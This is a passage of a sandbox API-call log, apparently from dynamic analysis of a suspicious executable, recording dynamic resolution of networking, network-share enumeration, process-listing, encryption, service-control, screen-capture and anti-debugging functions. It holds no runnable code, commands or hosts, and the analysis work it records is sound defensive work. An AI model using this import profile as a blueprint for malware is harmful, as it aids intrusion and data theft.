(lpLibFileName="MPR.dll") returned 0x75590000 [0110.198] GetProcAddress (hModule=0x75590000, lpProcName="WNetOpenEnumW") returned 0x75592f06 [0110.198] GetProcAddress (hModule=0x75590000, lpProcName="WNetEnumResourceW") returned 0x75593058 [0110.198] GetProcAddress (hModule=0x75590000, lpProcName="WNetCloseEnum") returned 0x75592dd6 [0110.198] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x758d0000 [0110.210] GetProcAddress (hModule=0x758d0000, lpProcName="InternetCloseHandle") returned 0x758eab49 [0110.210] GetProcAddress (hModule=0x758d0000, lpProcName="InternetReadFile") returned 0x758eb406 [0110.210] GetProcAddress (hModule=0x758d0000, lpProcName="InternetOpenUrlW") returned 0x7594be5c [0110.210] GetProcAddress (hModule=0x758d0000, lpProcName="InternetOpenW") returned 0x758f9197 [0110.211] GetProcAddress (hModule=0x758d0000, lpProcName="HttpQueryInfoW") returned 0x758f5c75 [0110.211] GetProcAddress (hModule=0x758d0000, lpProcName="InternetOpenA") returned 0x758ff18e [0110.211] GetProcAddress (hModule=0x758d0000, lpProcName="InternetOpenUrlA") returned 0x759130f1 [0110.211] LoadLibraryA (lpLibFileName="WINMM.dll") returned 0x75550000 [0110.214] GetProcAddress (hModule=0x75550000, lpProcName="timeGetTime") returned 0x755526e0 [0110.214] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x772f0000 [0110.214] GetProcAddress (hModule=0x772f0000, lpProcName="PathAppendA") returned 0x772fd65e [0110.214] GetProcAddress (hModule=0x772f0000, lpProcName="PathFindFileNameW") returned 0x7730bb71 [0110.214] GetProcAddress (hModule=0x772f0000, lpProcName="PathRemoveFileSpecW") returned 0x77303248 [0110.214] GetProcAddress (hModule=0x772f0000, lpProcName="PathFileExistsA") returned 0x7732ad1a [0110.214] GetProcAddress (hModule=0x772f0000, lpProcName="PathFileExistsW") returned 0x773045bf [0110.214] GetProcAddress (hModule=0x772f0000, lpProcName="PathAppendW") returned 0x773081ef [0110.214] GetProcAddress (hModule=0x772f0000, lpProcName="PathFindExtensionW") returned 0x7730a1b9 [0110.214] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x76d30000 [0110.215] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualFree") returned 0x76d4186e [0110.215] GetProcAddress (hModule=0x76d30000, lpProcName="WriteFile") returned 0x76d41282 [0110.215] GetProcAddress (hModule=0x76d30000, lpProcName="GetDriveTypeA") returned 0x76d5ef75 [0110.215] GetProcAddress (hModule=0x76d30000, lpProcName="OpenProcess") returned 0x76d41986 [0110.215] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalAlloc") returned 0x76d4588e [0110.215] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemDirectoryW") returned 0x76d45063 [0110.215] GetProcAddress (hModule=0x76d30000, lpProcName="WideCharToMultiByte") returned 0x76d4170d [0110.215] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryW") returned 0x76d4492b [0110.215] GetProcAddress (hModule=0x76d30000, lpProcName="Sleep") returned 0x76d410ff [0110.215] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileW") returned 0x76d6830d [0110.215] GetProcAddress (hModule=0x76d30000, lpProcName="FormatMessageW") returned 0x76d44620 [0110.215] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcpynW") returned 0x76d6d556 [0110.216] GetProcAddress (hModule=0x76d30000, lpProcName="CreateProcessA") returned 0x76d41072 [0110.216] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0110.216] GetProcAddress (hModule=0x76d30000, lpProcName="ReadFile") returned 0x76d43ed3 [0110.216] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileW") returned 0x76d43f5c [0110.216] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcatA") returned 0x76d62b7a [0110.216] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentVariableA") returned 0x76d433a0 [0110.216] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcmpW") returned 0x76d45929 [0110.216] GetProcAddress (hModule=0x76d30000, lpProcName="MultiByteToWideChar") returned 0x76d4192e [0110.216] GetProcAddress (hModule=0x76d30000, lpProcName="lstrlenW") returned 0x76d41700 [0110.216] GetProcAddress (hModule=0x76d30000, lpProcName="FlushFileBuffers") returned 0x76d4469b [0110.216] GetProcAddress (hModule=0x76d30000, lpProcName="GetShortPathNameA") returned 0x76d6594d [0110.216] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileSizeEx") returned 0x76d459e2 [0110.216] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0110.217] GetProcAddress (hModule=0x76d30000, lpProcName="SetLastError") returned 0x76d411a9 [0110.217] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcAddress") returned 0x76d41222 [0110.217] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualAlloc") returned 0x76d41856 [0110.217] GetProcAddress (hModule=0x76d30000, lpProcName="MoveFileW") returned 0x76d59af0 [0110.217] GetProcAddress (hModule=0x76d30000, lpProcName="FindClose") returned 0x76d44442 [0110.217] GetProcAddress (hModule=0x76d30000, lpProcName="Process32FirstW") returned 0x76d68baf [0110.217] GetProcAddress (hModule=0x76d30000, lpProcName="LocalAlloc") returned 0x76d4168c [0110.217] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventW") returned 0x76d4183e [0110.217] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameA") returned 0x76d414b1 [0110.217] GetProcAddress (hModule=0x76d30000, lpProcName="Process32NextW") returned 0x76d6896c [0110.217] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcatW") returned 0x76d6828e [0110.217] GetProcAddress (hModule=0x76d30000, lpProcName="CreateMutexA") returned 0x76d44c6b [0110.218] GetProcAddress (hModule=0x76d30000, lpProcName="FindNextFileW") returned 0x76d454ee [0110.218] GetProcAddress (hModule=0x76d30000, lpProcName="CreateToolhelp32Snapshot") returned 0x76d6735f [0110.218] GetProcAddress (hModule=0x76d30000, lpProcName="SetEnvironmentVariableA") returned 0x76d4e331 [0110.218] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteFileW") returned 0x76d489b3 [0110.218] GetProcAddress (hModule=0x76d30000, lpProcName="LocalFree") returned 0x76d42d3c [0110.218] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcpyW") returned 0x76d63102 [0110.218] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteFileA") returned 0x76d45444 [0110.218] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcpyA") returned 0x76d62a9d [0110.218] GetProcAddress (hModule=0x76d30000, lpProcName="SetPriorityClass") returned 0x76d5cf28 [0110.218] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcess") returned 0x76d41809 [0110.218] GetProcAddress (hModule=0x76d30000, lpProcName="GetComputerNameW") returned 0x76d4dd0e [0110.218] GetProcAddress (hModule=0x76d30000, lpProcName="GetLogicalDrives") returned 0x76d45371 [0110.218] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameW") returned 0x76d44950 [0110.219] GetProcAddress (hModule=0x76d30000, lpProcName="SetStdHandle") returned 0x76dc454f [0110.219] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersion") returned 0x76d44467 [0110.219] GetProcAddress (hModule=0x76d30000, lpProcName="CreateDirectoryA") returned 0x76d6d526 [0110.219] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThread") returned 0x76d434d5 [0110.219] GetProcAddress (hModule=0x76d30000, lpProcName="CompareStringW") returned 0x76d43bca [0110.219] GetProcAddress (hModule=0x76d30000, lpProcName="GetTimeFormatW") returned 0x76d5f481 [0110.219] GetProcAddress (hModule=0x76d30000, lpProcName="GetDateFormatW") returned 0x76d634d7 [0110.219] GetProcAddress (hModule=0x76d30000, lpProcName="EnumSystemLocalesW") returned 0x76dc425f [0110.219] GetProcAddress (hModule=0x76d30000, lpProcName="GetUserDefaultLCID") returned 0x76d43da5 [0110.219] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidLocale") returned 0x76d5ce46 [0110.220] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocaleInfoW") returned 0x76d43c42 [0110.220] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSemaphoreW") returned 0x76d5ca5a [0110.220] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleW") returned 0x76d434b0 [0110.220] GetProcAddress (hModule=0x76d30000, lpProcName="GetTickCount") returned 0x76d4110c [0110.220] GetProcAddress (hModule=0x76d30000, lpProcName="TlsFree") returned 0x76d43587 [0110.220] GetProcAddress (hModule=0x76d30000, lpProcName="TlsSetValue") returned 0x76d414fb [0110.220] GetProcAddress (hModule=0x76d30000, lpProcName="TlsGetValue") returned 0x76d411e0 [0110.220] GetProcAddress (hModule=0x76d30000, lpProcName="TlsAlloc") returned 0x76d449ad [0110.220] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76d41916 [0110.220] GetProcAddress (hModule=0x76d30000, lpProcName="SetUnhandledExceptionFilter") returned 0x76d487c9 [0110.220] GetProcAddress (hModule=0x76d30000, lpProcName="UnhandledExceptionFilter") returned 0x76d6772f [0110.220] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleA") returned 0x76d41245 [0110.221] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersionExA") returned 0x76d43519 [0110.221] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalMemoryStatus") returned 0x76d48b6d [0110.221] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryA") returned 0x76d449d7 [0110.221] GetProcAddress (hModule=0x76d30000, lpProcName="FlushConsoleInputBuffer") returned 0x76de7a9f [0110.221] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForSingleObject") returned 0x76d41136 [0110.221] GetProcAddress (hModule=0x76d30000, lpProcName="CreateDirectoryW") returned 0x76d44259 [0110.221] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointerEx") returned 0x76d5c807 [0110.221] GetProcAddress (hModule=0x76d30000, lpProcName="CreateProcessW") returned 0x76d4103d [0110.221] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibrary") returned 0x76d434c8 [0110.221] GetProcAddress (hModule=0x76d30000, lpProcName="SetErrorMode") returned 0x76d41b00 [0110.221] GetProcAddress (hModule=0x76d30000, lpProcName="lstrlenA") returned 0x76d45a4b [0110.221] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointer") returned 0x76d417d1 [0110.221] GetProcAddress (hModule=0x76d30000, lpProcName="FindFirstFileW") returned 0x76d44435 [0110.222] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleMode") returned 0x76d5a77d [0110.222] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileA") returned 0x76d453c6 [0110.222] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineW") returned 0x76d45223 [0110.222] GetProcAddress (hModule=0x76d30000, lpProcName="GetNumberOfConsoleInputEvents") returned 0x76de793f [0110.222] GetProcAddress (hModule=0x76d30000, lpProcName="PeekConsoleInputA") returned 0x76de6f0d [0110.222] GetProcAddress (hModule=0x76d30000, lpProcName="FreeEnvironmentStringsW") returned 0x76d451cb [0110.222] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentStringsW") returned 0x76d451e3 [0110.222] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessId") returned 0x76d411f8 [0110.222] GetProcAddress (hModule=0x76d30000, lpProcName="QueryPerformanceCounter") returned 0x76d41725 [0110.222] GetProcAddress (hModule=0x76d30000, lpProcName="GetTimeZoneInformation") returned 0x76d4465a [0110.222] GetProcAddress (hModule=0x76d30000, lpProcName="RaiseException") returned 0x76d458a6 [0110.222] GetProcAddress (hModule=0x76d30000, lpProcName="GetStringTypeW") returned 0x76d41946 [0110.222] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleCP") returned 0x76de7bff [0110.223] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleW") returned 0x76de739a [0110.223] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleMode") returned 0x76d41328 [0110.223] GetProcAddress (hModule=0x76d30000, lpProcName="HeapSize") returned 0x77c73002 [0110.223] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryExW") returned 0x76d4495d [0110.223] GetProcAddress (hModule=0x76d30000, lpProcName="OutputDebugStringW") returned 0x76d6d1d4 [0110.223] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleCtrlHandler") returned 0x76d48a09 [0110.223] GetProcAddress (hModule=0x76d30000, lpProcName="RtlUnwind") returned 0x76d6d1c3 [0110.223] GetProcAddress (hModule=0x76d30000, lpProcName="FatalAppExitA") returned 0x76dc4691 [0110.223] GetProcAddress (hModule=0x76d30000, lpProcName="GetStartupInfoW") returned 0x76d44d40 [0110.223] GetProcAddress (hModule=0x76d30000, lpProcName="GetExitCodeProcess") returned 0x76d5174d [0110.223] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringW") returned 0x76d417b9 [0110.223] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteCriticalSection") returned 0x77c745f5 [0110.223] GetProcAddress (hModule=0x76d30000, lpProcName="AreFileApisANSI") returned 0x76dc40d1 [0110.224] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0110.224] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcessHeap") returned 0x76d414e9 [0110.224] GetProcAddress (hModule=0x76d30000, lpProcName="HeapReAlloc") returned 0x77c81f6e [0110.224] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalFree") returned 0x76d45558 [0110.224] GetProcAddress (hModule=0x76d30000, lpProcName="SetEndOfFile") returned 0x76d5ce2e [0110.224] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleInputA") returned 0x76de6f53 [0110.224] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0110.224] GetProcAddress (hModule=0x76d30000, lpProcName="HeapFree") returned 0x76d414c9 [0110.224] GetProcAddress (hModule=0x76d30000, lpProcName="HeapAlloc") returned 0x77c6e026 [0110.224] GetProcAddress (hModule=0x76d30000, lpProcName="EnterCriticalSection") returned 0x77c622b0 [0110.224] GetProcAddress (hModule=0x76d30000, lpProcName="LeaveCriticalSection") returned 0x77c62270 [0110.224] GetProcAddress (hModule=0x76d30000, lpProcName="GetStdHandle") returned 0x76d451b3 [0110.224] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileType") returned 0x76d43531 [0110.225] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleExW") returned 0x76d44a6f [0110.225] GetProcAddress (hModule=0x76d30000, lpProcName="WriteConsoleW") returned 0x76d67aca [0110.225] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0110.225] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0110.225] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemTimeAsFileTime") returned 0x76d43509 [0110.225] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0110.225] GetProcAddress (hModule=0x76d30000, lpProcName="IsProcessorFeaturePresent") returned 0x76d45235 [0110.225] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidCodePage") returned 0x76d44493 [0110.225] GetProcAddress (hModule=0x76d30000, lpProcName="GetACP") returned 0x76d4179c [0110.225] GetProcAddress (hModule=0x76d30000, lpProcName="GetOEMCP") returned 0x76d6d1a1 [0110.225] GetProcAddress (hModule=0x76d30000, lpProcName="GetCPInfo") returned 0x76d45189 [0110.225] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThread") returned 0x76d417ec [0110.226] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThreadId") returned 0x76d41450 [0110.226] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x77130000 [0110.226] GetProcAddress (hModule=0x77130000, lpProcName="PeekMessageW") returned 0x771505ba [0110.226] GetProcAddress (hModule=0x77130000, lpProcName="PostThreadMessageW") returned 0x77148bff [0110.226] GetProcAddress (hModule=0x77130000, lpProcName="DefWindowProcW") returned 0x77c725dd [0110.226] GetProcAddress (hModule=0x77130000, lpProcName="DispatchMessageW") returned 0x7714787b [0110.226] GetProcAddress (hModule=0x77130000, lpProcName="UpdateWindow") returned 0x77153559 [0110.226] GetProcAddress (hModule=0x77130000, lpProcName="CreateWindowExW") returned 0x77148a29 [0110.226] GetProcAddress (hModule=0x77130000, lpProcName="LoadCursorW") returned 0x771488f7 [0110.226] GetProcAddress (hModule=0x77130000, lpProcName="IsWindow") returned 0x77147136 [0110.226] GetProcAddress (hModule=0x77130000, lpProcName="ShowWindow") returned 0x77150dfb [0110.226] GetProcAddress (hModule=0x77130000, lpProcName="RegisterClassExW") returned 0x7714b17d [0110.227] GetProcAddress (hModule=0x77130000, lpProcName="PostQuitMessage") returned 0x77149abb [0110.227] GetProcAddress (hModule=0x77130000, lpProcName="GetMessageW") returned 0x771478e2 [0110.227] GetProcAddress (hModule=0x77130000, lpProcName="DestroyWindow") returned 0x77149a55 [0110.227] GetProcAddress (hModule=0x77130000, lpProcName="SendMessageW") returned 0x77149679 [0110.227] GetProcAddress (hModule=0x77130000, lpProcName="GetProcessWindowStation") returned 0x77149eea [0110.227] GetProcAddress (hModule=0x77130000, lpProcName="GetUserObjectInformationW") returned 0x77148068 [0110.227] GetProcAddress (hModule=0x77130000, lpProcName="MessageBoxA") returned 0x7719fd1e [0110.227] GetProcAddress (hModule=0x77130000, lpProcName="GetDesktopWindow") returned 0x77150a19 [0110.227] GetProcAddress (hModule=0x77130000, lpProcName="MessageBoxW") returned 0x7719fd3f [0110.227] GetProcAddress (hModule=0x77130000, lpProcName="TranslateMessage") returned 0x77147809 [0110.227] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77710000 [0110.227] GetProcAddress (hModule=0x77710000, lpProcName="RegCloseKey") returned 0x7772469d [0110.227] GetProcAddress (hModule=0x77710000, lpProcName="CloseServiceHandle") returned 0x7772369c [0110.228] GetProcAddress (hModule=0x77710000, lpProcName="GetUserNameW") returned 0x7772157a [0110.228] GetProcAddress (hModule=0x77710000, lpProcName="ReportEventA") returned 0x77713ee9 [0110.228] GetProcAddress (hModule=0x77710000, lpProcName="RegisterEventSourceA") returned 0x77722d46 [0110.228] GetProcAddress (hModule=0x77710000, lpProcName="DeregisterEventSource") returned 0x777235dd [0110.228] GetProcAddress (hModule=0x77710000, lpProcName="CryptHashData") returned 0x7771df36 [0110.228] GetProcAddress (hModule=0x77710000, lpProcName="RegSetValueExW") returned 0x777214d6 [0110.228] GetProcAddress (hModule=0x77710000, lpProcName="CryptDestroyHash") returned 0x7771df66 [0110.228] GetProcAddress (hModule=0x77710000, lpProcName="ControlService") returned 0x77737144 [0110.228] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyExW") returned 0x7772468d [0110.228] GetProcAddress (hModule=0x77710000, lpProcName="CryptCreateHash") returned 0x7771df4e [0110.228] GetProcAddress (hModule=0x77710000, lpProcName="CryptEncrypt") returned 0x7773779b [0110.228] GetProcAddress (hModule=0x77710000, lpProcName="CryptImportKey") returned 0x7771c532 [0110.228] GetProcAddress (hModule=0x77710000, lpProcName="QueryServiceStatus") returned 0x77722a86 [0110.229] GetProcAddress (hModule=0x77710000, lpProcName="RegQueryValueExW") returned 0x777246ad [0110.229] GetProcAddress (hModule=0x77710000, lpProcName="CryptReleaseContext") returned 0x7771e124 [0110.229] GetProcAddress (hModule=0x77710000, lpProcName="OpenServiceW") returned 0x7771ca4c [0110.229] GetProcAddress (hModule=0x77710000, lpProcName="OpenSCManagerW") returned 0x7771ca64 [0110.229] GetProcAddress (hModule=0x77710000, lpProcName="CryptAcquireContextW") returned 0x7771df14 [0110.229] GetProcAddress (hModule=0x77710000, lpProcName="CryptGetHashParam") returned 0x7771df7e [0110.229] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x759d0000 [0110.232] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetPathFromIDListW") returned 0x75a617bf [0110.232] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetSpecialFolderLocation") returned 0x75a5e141 [0110.232] GetProcAddress (hModule=0x759d0000, lpProcName="ShellExecuteA") returned 0x75c17078 [0110.232] GetProcAddress (hModule=0x759d0000, lpProcName="ShellExecuteExW") returned 0x759f1e46 [0110.232] GetProcAddress (hModule=0x759d0000, lpProcName="CommandLineToArgvW") returned 0x759e9ee8 [0110.232] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathA") returned 0x75ae7804 [0110.232] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x76620000 [0110.232] GetProcAddress (hModule=0x76620000, lpProcName="CoInitialize") returned 0x7663b636 [0110.233] GetProcAddress (hModule=0x76620000, lpProcName="CoInitializeSecurity") returned 0x76647259 [0110.233] GetProcAddress (hModule=0x76620000, lpProcName="CoUninitialize") returned 0x766686d3 [0110.233] GetProcAddress (hModule=0x76620000, lpProcName="CoCreateInstance") returned 0x76669d0b [0110.233] LoadLibraryA (lpLibFileName="OLEAUT32.dll") returned 0x76e40000 [0110.233] GetProcAddress (hModule=0x76e40000, lpProcName=0x6) returned 0x76e43e59 [0110.233] GetProcAddress (hModule=0x76e40000, lpProcName=0x8) returned 0x76e43ed5 [0110.233] GetProcAddress (hModule=0x76e40000, lpProcName=0x9) returned 0x76e43eae [0110.233] GetProcAddress (hModule=0x76e40000, lpProcName=0xc8) returned 0x76e43f21 [0110.233] GetProcAddress (hModule=0x76e40000, lpProcName=0xca) returned 0x76e4fd6b [0110.233] GetProcAddress (hModule=0x76e40000, lpProcName=0xc9) returned 0x76e44af8 [0110.233] GetProcAddress (hModule=0x76e40000, lpProcName=0xc) returned 0x76e45dee [0110.233] GetProcAddress (hModule=0x76e40000, lpProcName=0x2) returned 0x76e44642 [0110.233] LoadLibraryA (lpLibFileName="IPHLPAPI.DLL") returned 0x755b0000 [0110.238] GetProcAddress (hModule=0x755b0000, lpProcName="GetAdaptersInfo") returned 0x755b9263 [0110.238] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x77230000 [0110.240] GetProcAddress (hModule=0x77230000, lpProcName=0xc) returned 0x7723b131 [0110.240] GetProcAddress (hModule=0x77230000, lpProcName=0xb) returned 0x7723311b [0110.240] GetProcAddress (hModule=0x77230000, lpProcName=0x34) returned 0x77247673 [0110.240] LoadLibraryA (lpLibFileName="DNSAPI.dll") returned 0x754e0000 [0110.245] GetProcAddress (hModule=0x754e0000, lpProcName="DnsFree") returned 0x754e436b [0110.246] GetProcAddress (hModule=0x754e0000, lpProcName="DnsQuery_W") returned 0x754f572c [0110.246] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x77550000 [0110.246] GetProcAddress (hModule=0x77550000, lpProcName="CryptStringToBinaryA") returned 0x77585d77 [0110.246] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x770a0000 [0110.246] GetProcAddress (hModule=0x770a0000, lpProcName="DeleteObject") returned 0x770b5689 [0110.246] GetProcAddress (hModule=0x770a0000, lpProcName="GetObjectA") returned 0x770b85d4 [0110.246] GetProcAddress (hModule=0x770a0000, lpProcName="SelectObject") returned 0x770b4f70 [0110.246] GetProcAddress (hModule=0x770a0000, lpProcName="GetDeviceCaps") returned 0x770b4de0 [0110.246] GetProcAddress (hModule=0x770a0000, lpProcName="GetBitmapBits") returned 0x770bc155 [0110.246] GetProcAddress (hModule=0x770a0000, lpProcName="BitBlt") returned 0x770b5ea6 [0110.246] GetProcAddress (hModule=0x770a0000, lpProcName="DeleteDC") returned 0x770b58b3 [0110.247] GetProcAddress (hModule=0x770a0000, lpProcName="CreateDCA") returned 0x770b7bcc [0110.247] GetProcAddress (hModule=0x770a0000, lpProcName="CreateCompatibleDC") returned 0x770b54f4 [0110.247] GetProcAddress (hModule=0x770a0000, lpProcName="CreateCompatibleBitmap") returned 0x770b5f49 [0110.247] LoadLibraryA (lpLibFileName="msvcr100.dll") returned 0x75420000 [0110.253] GetProcAddress (hModule=0x75420000, lpProcName="atexit") returned 0x7543c544 [0110.253] atexit (param_1=0x6190920) returned 0 [0110.253] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18eda0 | out: lpSystemTimeAsFileTime=0x18eda0*(dwLowDateTime=0xdafd97c0, dwHighDateTime=0x1d6d58a)) [0110.253] GetCurrentThreadId () returned 0x324 [0110.253] GetCurrentProcessId () returned 0x34c [0110.253] QueryPerformanceCounter (in: lpPerformanceCount=0x18ed98 | out: lpPerformanceCount=0x18ed98*=23042706895) returned 1 [0110.253] GetStartupInfoW (in: lpStartupInfo=0x18ed30 | out: lpStartupInfo=0x18ed30*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OqRoSnESYXcDITEx.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x5, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x76d43519, hStdOutput=0x77c5fd35, hStdError=0x77cc7daf)) [0110.253] GetProcessHeap () returned 0x4970000 [0110.254] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0110.254] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0110.254] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0110.254] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0110.254] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0110.254] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionEx") returned 0x76d44d28 [0110.254] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventExW") returned 0x76dc410b [0110.254] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSemaphoreExW") returned 0x76dc4195 [0110.254] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadStackGuarantee") returned 0x76d4d31f [0110.255] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolTimer") returned 0x76d5ee7e [0110.255] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolTimer") returned 0x77c8441c [0110.255] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x77cac50e [0110.255] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolTimer") returned 0x77cac381 [0110.255] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolWait") returned 0x76d5f088 [0110.255] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolWait") returned 0x77c905d7 [0110.255] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolWait") returned 0x77caca24 [0110.255] GetProcAddress (hModule=0x76d30000, lpProcName="FlushProcessWriteBuffers") returned 0x77c60b8c [0110.255] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x77d1fde8 [0110.255] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessorNumber") returned 0x77cb1e1d [0110.255] GetProcAddress (hModule=0x76d30000, lpProcName="GetLogicalProcessorInformation") returned 0x76dc4761 [0110.256] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSymbolicLinkW") returned 0x76dbcd11 [0110.256] GetProcAddress (hModule=0x76d30000, lpProcName="SetDefaultDllDirectories") returned 0x0 [0110.256] GetProcAddress (hModule=0x76d30000, lpProcName="EnumSystemLocalesEx") returned 0x76dc424f [0110.256] GetProcAddress (hModule=0x76d30000, lpProcName="CompareStringEx") returned 0x76dc46b1 [0110.256] GetProcAddress (hModule=0x76d30000, lpProcName="GetDateFormatEx") returned 0x76dd6676 [0110.256] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocaleInfoEx") returned 0x76dc4751 [0110.256] GetProcAddress (hModule=0x76d30000, lpProcName="GetTimeFormatEx") returned 0x76dd65f1 [0110.256] GetProcAddress (hModule=0x76d30000, lpProcName="GetUserDefaultLocaleName") returned 0x76dc47c1 [0110.256] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidLocaleName") returned 0x76dc47e1 [0110.256] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringEx") returned 0x76dc47f1 [0110.256] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentPackageId") returned 0x0 [0110.257] GetProcAddress (hModule=0x76d30000, lpProcName="GetTickCount64") returned 0x76d5eee0 [0110.257] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0110.257] GetProcAddress (hModule=0x76d30000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0110.257] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x8, Size=0x3bc) returned 0x498f2c8 [0110.257] GetCurrentThreadId () returned 0x324 [0110.257] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x4980f18 [0110.258] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x8, Size=0x800) returned 0x498f690 [0110.258] GetStartupInfoW (in: lpStartupInfo=0x18ed00 | out: lpStartupInfo=0x18ed00*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OqRoSnESYXcDITEx.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, 